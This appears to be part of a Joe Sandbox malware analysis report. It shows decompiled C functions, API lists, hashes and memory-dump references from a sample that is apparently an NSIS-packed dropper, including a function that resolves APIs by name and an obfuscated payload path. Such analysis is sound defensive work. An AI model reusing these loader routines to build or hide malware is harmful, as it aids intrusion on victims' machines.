Associated: 00000006.00000002.45132454040.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007D8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45135016541.00000000007DA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hi38VYWujz.jbxd

Similarity

API ID: ByteCharMultiWidelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nscDB19.tmp$C:\Users\user\AppData\Local\Temp\nscDB19.tmp\System.dll
API String ID: 3109718747-933527392
Opcode ID: b12df498abedb34b717a172da15718af2b4b4c367ff4dc2f2e44eabaa543b304
Instruction ID: aeea25b17c56a12648c97371da72875efc2076f5b2bafbb971aab2720b62453c
Opcode Fuzzy Hash: b12df498abedb34b717a172da15718af2b4b4c367ff4dc2f2e44eabaa543b304
Instruction Fuzzy Hash: B5115B72A00200BECB106FB18E8D99F7664AF95389F20843FF502F22C1DAFC49425B5E

Uniqueness

Uniqueness Score: -1.00%

Function 100022D0 Relevance: 7.6, APIs: 5, Instructions: 135
memoryCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E100022D0(void* __edx) {
				void* _t37;
				signed int _t38;
				void* _t39;
				void* _t41;
				signed int* _t42;
				signed int* _t51;
				void* _t52;
				void* _t54;

				 *(_t54 + 0x10) = 0 |  *((intOrPtr*)( *((intOrPtr*)(_t54 + 8)) + 0x1014)) > 0x00000000;
				while(1) {
					_t9 =  *((intOrPtr*)(_t54 + 0x18)) + 0x1018; // 0x1018
					_t51 = ( *(_t54 + 0x10) << 5) + _t9;
					_t52 = _t51[6];
					if(_t52 == 0) {
						goto L9;
					}
					_t41 = 0x1a;
					if(_t52 == _t41) {
						goto L9;
					}
					if(_t52 != 0xffffffff) {
						if(_t52 <= 0 || _t52 > 0x19) {
							_t51[6] = _t41;
							goto L12;
						} else {
							_t37 = E100012BA(_t52 - 1);
							L10:
							goto L11;
						}
					} else {
						_t37 = E10001243();
						L11:
						_t52 = _t37;
						L12:
						_t13 =  &(_t51[2]); // 0x1020
						_t42 = _t13;
						if(_t51[1] != 0xffffffff) {
						}
						_t38 =  *_t51;
						_t51[7] = 0;
						if(_t38 > 7) {
							L27:
							_t39 = GlobalFree(_t52);
							if( *(_t54 + 0x10) == 0) {
								return _t39;
							}
							if( *(_t54 + 0x10) !=  *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x18)) + 0x1014))) {
								 *(_t54 + 0x10) =  *(_t54 + 0x10) + 1;
							} else {
								 *(_t54 + 0x10) =  *(_t54 + 0x10) & 0x00000000;
							}
							continue;
						} else {
							switch( *((intOrPtr*)(_t38 * 4 +  &M10002447))) {
								case 0:
									 *_t42 = 0;
									goto L27;
								case 1:
									__eax = E10001311(__ebp);
									goto L21;
								case 2:
									 *__edi = E10001311(__ebp);
									__edi[1] = __edx;
									goto L27;
								case 3:
									__eax = GlobalAlloc(0x40,  *0x1000406c);
									 *(__esi + 0x1c) = __eax;
									__edx = 0;
									 *__edi = __eax;
									__eax = WideCharToMultiByte(0, 0, __ebp,  *0x1000406c, __eax,  *0x1000406c, 0, 0);
									goto L27;
								case 4:
									__eax = E1000122C(__ebp);
									 *(__esi + 0x1c) = __eax;
									L21:
									 *__edi = __eax;
									goto L27;
								case 5:
									__eax = GlobalAlloc(0x40, 0x10);
									_push(__eax);
									 *(__esi + 0x1c) = __eax;
									_push(__ebp);
									 *__edi = __eax;
									__imp__CLSIDFromString();
									goto L27;
								case 6:
									if( *__ebp != __cx) {
										__eax = E10001311(__ebp);
										 *__ebx = __eax;
									}
									goto L27;
								case 7:
									 *(__esi + 0x18) =  *(__esi + 0x18) - 1;
									( *(__esi + 0x18) - 1) *  *0x1000406c =  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2 + 0x18;
									 *__ebx =  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2 + 0x18;
									asm("cdq");
									__eax = E10001470(__edx,  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2 + 0x18, __edx,  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2);
									goto L27;
							}
						}
					}
					L9:
					_t37 = E1000122C(0x10004044);
					goto L10;
				}
			}

0x100022e4
0x100022e8
0x100022f3
0x100022f3
0x100022fa
0x100022ff
0x00000000
0x00000000
0x10002303
0x10002306
0x00000000
0x00000000
0x1000230b
0x10002316
0x10002326
0x00000000
0x1000231d
0x1000231f
0x10002335
0x00000000
0x10002335
0x1000230d
0x1000230d
0x10002336
0x10002336
0x10002338
0x1000233c
0x1000233c
0x1000233f
0x1000233f
0x10002347
0x1000234e
0x10002351
0x10002410
0x10002411
0x1000241c
0x10002446
0x10002446
0x1000242c
0x10002438
0x1000242e
0x1000242e
0x1000242e
0x00000000
0x10002357
0x10002357
0x00000000
0x1000235e
0x00000000
0x00000000
0x10002366
0x00000000
0x00000000
0x10002374
0x10002376
0x00000000
0x00000000
0x10002397
0x1000239d
0x100023a0
0x100023a2
0x100023b2
0x00000000
0x00000000
0x1000237f
0x10002384
0x10002387
0x10002388
0x00000000
0x00000000
0x100023be
0x100023c4
0x100023c5
0x100023c8
0x100023c9
0x100023cb
0x00000000
0x00000000
0x100023d7
0x100023da
0x100023e6
0x100023e8
0x00000000
0x00000000
0x100023f4
0x10002400
0x10002403
0x10002405
0x10002408
0x00000000
0x00000000
0x10002357
0x10002351
0x1000232b
0x10002330
0x00000000
0x10002330

APIs

GlobalFree.KERNEL32(00000000), ref: 10002411

Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C

GlobalAlloc.KERNEL32(00000040), ref: 10002397
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2

Memory Dump Source

Source File: 00000006.00000002.45232552637.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.45232522122.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.45232596193.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.45232631278.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_hi38VYWujz.jbxd

Similarity

API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
String ID:
API String ID: 4216380887-0
Opcode ID: 40c1fda0fc222d3deaf0be0606799ffba2a33d40f74f168943dcfaeb9bc9158e
Instruction ID: e010a8171ff36a63e9221139458dc5df23460d7ee6f57f6168b5e09891e1807c
Opcode Fuzzy Hash: 40c1fda0fc222d3deaf0be0606799ffba2a33d40f74f168943dcfaeb9bc9158e
Instruction Fuzzy Hash: 9141D2B4408305EFF324DF24C880A6AB7F8FB843D4B11892DF94687199DB34BA94CB65

Uniqueness

Uniqueness Score: -1.00%

Function 100015FF Relevance: 7.5, APIs: 5, Instructions: 41
memorylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E100015FF(struct HINSTANCE__* _a4, short* _a8) {
				_Unknown_base(*)()* _t7;
				void* _t10;
				int _t14;

				_t14 = WideCharToMultiByte(0, 0, _a8, 0xffffffff, 0, 0, 0, 0);
				_t10 = GlobalAlloc(0x40, _t14);
				WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t10, _t14, 0, 0);
				_t7 = GetProcAddress(_a4, _t10);
				GlobalFree(_t10);
				return _t7;
			}

0x10001619
0x10001625
0x10001632
0x10001639
0x10001642
0x1000164e

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
GlobalFree.KERNEL32(00000000), ref: 10001642

Memory Dump Source

Source File: 00000006.00000002.45232552637.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.45232522122.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.45232596193.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.45232631278.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_hi38VYWujz.jbxd

Similarity

API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
String ID:
API String ID: 1148316912-0
Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1

Uniqueness

Uniqueness Score: -1.00%

Function 00401D57 Relevance: 7.5, APIs: 5, Instructions: 39
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401D57() {
				void* _t18;
				struct HINSTANCE__* _t22;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 8),  *(_t27 - 0x24));
				GetClientRect(_t25, _t27 - 0x58);
				_t18 = SendMessageW(_t25, 0x172, _t22, LoadImageW(_t22, E00402C37(_t22), _t22,  *(_t27 - 0x50) *  *(_t27 - 0x20),  *(_t27 - 0x4c) *  *(_t27 - 0x20), 0x10));
				if(_t18 != _t22) {
					DeleteObject(_t18);
				}
				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}

0x00401d63
0x00401d6a
0x00401d99
0x00401da1
0x00401da8
0x00401da8
0x00402ac2
0x00402ace

APIs

GetDlgItem.USER32(?,?), ref: 00401D5D
GetClientRect.USER32(00000000,?), ref: 00401D6A
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D8B
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D99
DeleteObject.GDI32(00000000), ref: 00401DA8

Memory Dump Source

Source File: 00000006.00000002.45132331372.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.45132294401.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132406736.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007D8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45135016541.00000000007DA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hi38VYWujz.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 3d379d5cf174b1f3754fd0e8aded0e40a14ad1f56653ff3a87a584377fb567a4
Instruction ID: d6b80873b4a6bbd9af873cfa92cf23dd081e8a17906ab7f6c0372a94bb23d9f5
Opcode Fuzzy Hash: 3d379d5cf174b1f3754fd0e8aded0e40a14ad1f56653ff3a87a584377fb567a4
Instruction Fuzzy Hash: 03F0ECB2604518AFDB41DBE4DE88CEEB7BCEB48341B14446AF641F6191CA789D118B68

Uniqueness

Uniqueness Score: -1.00%

Function 00404A7F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
stringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00404A7F(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v68;
				char _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				signed int _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t44;
				signed int _t46;
				signed int _t50;
				signed int _t52;
				signed int _t53;
				signed int _t55;

				_t23 = _a16;
				_t53 = _a12;
				_t44 = 0xffffffdc;
				if(_t23 == 0) {
					_push(0x14);
					_pop(0);
					_t24 = _t53;
					if(_t53 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t44 = 0xffffffdd;
					}
					if(_t53 < 0x400) {
						_t44 = 0xffffffde;
					}
					if(_t53 < 0xffff3333) {
						_t52 = 0x14;
						asm("cdq");
						_t24 = 1 / _t52 + _t53;
					}
					_t25 = _t24 & 0x00ffffff;
					_t55 = _t24 >> 0;
					_t46 = 0xa;
					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
				} else {
					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
					_t50 = 0;
				}
				_t31 = E00406281(_t44, _t50, _t55,  &_v68, 0xffffffdf);
				_t33 = E00406281(_t44, _t50, _t55,  &_v132, _t44);
				_t34 = E00406281(_t44, _t50, 0x7a1f20, 0x7a1f20, _a8);
				wsprintfW(_t34 + lstrlenW(0x7a1f20) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
				return SetDlgItemTextW( *0x7a79f8, _a4, 0x7a1f20);
			}

0x00404a88
0x00404a8d
0x00404a95
0x00404a96
0x00404aa3
0x00404aab
0x00404aac
0x00404aae
0x00404ab0
0x00404ab2
0x00404ab5
0x00404ab5
0x00404abc
0x00404ac2
0x00404ac2
0x00404ac9
0x00404ad0
0x00404ad3
0x00404ad6
0x00404ad6
0x00404ada
0x00404aea
0x00404aec
0x00404aef
0x00404a98
0x00404a98
0x00404a9f
0x00404a9f
0x00404af7
0x00404b02
0x00404b18
0x00404b29
0x00404b45

APIs

lstrlenW.KERNEL32(007A1F20,007A1F20,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B20
wsprintfW.USER32 ref: 00404B29
SetDlgItemTextW.USER32(?,007A1F20), ref: 00404B3C

Strings

%u.%u%s%s, xrefs: 00404B0A

Memory Dump Source

Source File: 00000006.00000002.45132331372.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.45132294401.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132406736.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007D8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45135016541.00000000007DA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hi38VYWujz.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: e52f1a5f5cfb5a9a0e1921420a7f7e901b35480ee7d38de5188ba9653754f71b
Instruction ID: e59333b35207274dfa12745fa15a0a2b1e84881af2dc0bba7fa0e94120285970
Opcode Fuzzy Hash: e52f1a5f5cfb5a9a0e1921420a7f7e901b35480ee7d38de5188ba9653754f71b
Instruction Fuzzy Hash: AD11EB73A441283BDB00A66D9C45E9E3298DB85374F250237FE26F21D1DD78C82286E8

Uniqueness

Uniqueness Score: -1.00%

Function 00401C19 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
windowtimeCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00401C19(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				WCHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t61;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402C15(3);
				 *((intOrPtr*)(_t64 - 0x4c)) = _t57;
				 *(_t64 - 0x10) = _t29;
				_t30 = E00402C15(4);
				 *((intOrPtr*)(_t64 - 0x4c)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x14) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x10)) = E00402C37(0x33);
				}
				__eflags =  *(_t64 - 0x14) & 0x00000002;
				if(( *(_t64 - 0x14) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402C37(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x2c)) - 0x21;
				_push("true");
				if(__eflags != 0) {
					_t59 = E00402C37();
					_t32 = E00402C37();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t59;
					__eflags = _t35;
					_t36 = FindWindowExW( *(_t64 - 0x10),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
					goto L10;
				} else {
					_t61 = E00402C15();
					 *((intOrPtr*)(_t64 - 0x4c)) = _t57;
					_t41 = E00402C15(2);
					 *((intOrPtr*)(_t64 - 0x4c)) = _t57;
					_t56 =  *(_t64 - 0x14) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageW(_t61, _t41,  *(_t64 - 0x10),  *(_t64 + 8));
						L10:
						 *(_t64 - 0x30) = _t36;
					} else {
						_t42 = SendMessageTimeoutW(_t61, _t41,  *(_t64 - 0x10),  *(_t64 + 8), _t46, _t56, _t64 - 0x30);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x28)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x28)) >= _t46) {
					_push( *(_t64 - 0x30));
					E004061A6();
				}
				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}

0x00401c19
0x00401c1b
0x00401c22
0x00401c25
0x00401c28
0x00401c32
0x00401c36
0x00401c39
0x00401c42
0x00401c42
0x00401c45
0x00401c49
0x00401c52
0x00401c52
0x00401c55
0x00401c59
0x00401c5b
0x00401cb0
0x00401cb2
0x00401cbd
0x00401cc7
0x00401cca
0x00401cca
0x00401cd3
0x00000000
0x00401c5d
0x00401c64
0x00401c66
0x00401c69
0x00401c6f
0x00401c76
0x00401c79
0x00401ca1
0x00401cd9
0x00401cd9
0x00401c7b
0x00401c89
0x00401c91
0x00401c94
0x00401c94
0x00401c79
0x00401cdc
0x00401cdf
0x00401ce5
0x00402a65
0x00402a65
0x00402ac2
0x00402ace

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C89
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA1

Strings

!, xrefs: 00401C55

Memory Dump Source

Source File: 00000006.00000002.45132331372.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.45132294401.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132406736.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007D8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45135016541.00000000007DA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hi38VYWujz.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 6465c28e5c943a4eb7eb01deaa6dcd84e082ef29e74d6367337f5043b789c329
Instruction ID: 77761fc61529e842a28ee3ca09cff7144389c8643cc82091ff338806125a9860
Opcode Fuzzy Hash: 6465c28e5c943a4eb7eb01deaa6dcd84e082ef29e74d6367337f5043b789c329
Instruction Fuzzy Hash: 9121C1B1948209AEEF05AFA5CE4AABE7BB4EF84308F14443EF502F61D0D7B84541DB18

Uniqueness

Uniqueness Score: -1.00%

Function 00405BDB Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405BDB(WCHAR* _a4) {
				WCHAR* _t5;
				short* _t7;
				WCHAR* _t10;
				short _t11;
				WCHAR* _t12;
				void* _t14;

				_t12 = _a4;
				_t10 = CharNextW(_t12);
				_t5 = CharNextW(_t10);
				_t11 =  *_t12;
				if(_t11 == 0 ||  *_t10 != 0x3a || _t10[1] != 0x5c) {
					if(_t11 != 0x5c || _t12[1] != _t11) {
						L10:
						return 0;
					} else {
						_t14 = 2;
						while(1) {
							_t14 = _t14 - 1;
							_t7 = E00405B5D(_t5, 0x5c);
							if( *_t7 == 0) {
								goto L10;
							}
							_t5 = _t7 + 2;
							if(_t14 != 0) {
								continue;
							}
							return _t5;
						}
						goto L10;
					}
				} else {
					return CharNextW(_t5);
				}
			}

0x00405be4
0x00405beb
0x00405bee
0x00405bf0
0x00405bf6
0x00405c0e
0x00405c30
0x00000000
0x00405c16
0x00405c18
0x00405c19
0x00405c1c
0x00405c1d
0x00405c26
0x00000000
0x00000000
0x00405c29
0x00405c2c
0x00000000
0x00000000
0x00000000
0x00405c2c
0x00000000
0x00405c19
0x00405c05
0x00000000
0x00405c06

APIs

CharNextW.USER32(?,?,Scienza\Pulmobranchiate.Rid207,?,00405C4F,Scienza\Pulmobranchiate.Rid207,Scienza\Pulmobranchiate.Rid207,?,?,75ED3420,0040598D,?,C:\Users\user\AppData\Local\Temp\,75ED3420,00000000), ref: 00405BE9
CharNextW.USER32(00000000), ref: 00405BEE
CharNextW.USER32(00000000), ref: 00405C06

Strings

Scienza\Pulmobranchiate.Rid207, xrefs: 00405BDC

Memory Dump Source

Source File: 00000006.00000002.45132331372.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.45132294401.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132406736.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007D8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45135016541.00000000007DA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hi38VYWujz.jbxd

Similarity

API ID: CharNext
String ID: Scienza\Pulmobranchiate.Rid207
API String ID: 3213498283-3418151385
Opcode ID: aebd7a4b5de8b759b0e4f0e56dc0d79cfb69ab96c88f82fda94e21a8a16d65f8
Instruction ID: 1410c8af8588119ed7c7bec0a33194e6879e2746ee2e5cb83f2c5ed70d44d846
Opcode Fuzzy Hash: aebd7a4b5de8b759b0e4f0e56dc0d79cfb69ab96c88f82fda94e21a8a16d65f8
Instruction Fuzzy Hash: 26F09022918B2D95FF3177584C55E7766B8EB55760B00803BE641B72C0D3F85C818EAA

Uniqueness

Uniqueness Score: -1.00%

Function 00405B30 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00405B30(WCHAR* _a4) {
				WCHAR* _t9;

				_t9 = _a4;
				_push( &(_t9[lstrlenW(_t9)]));
				_push(_t9);
				if( *(CharPrevW()) != 0x5c) {
					lstrcatW(_t9, 0x40a014);
				}
				return _t9;
			}

0x00405b31
0x00405b3e
0x00405b3f
0x00405b4a
0x00405b52
0x00405b52
0x00405b5a

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040333D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75ED3420,0040359C,?,00000006,00000008,0000000A), ref: 00405B36
CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040333D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75ED3420,0040359C,?,00000006,00000008,0000000A), ref: 00405B40
lstrcatW.KERNEL32(?,0040A014), ref: 00405B52

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405B30

Memory Dump Source

Source File: 00000006.00000002.45132331372.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.45132294401.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132406736.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
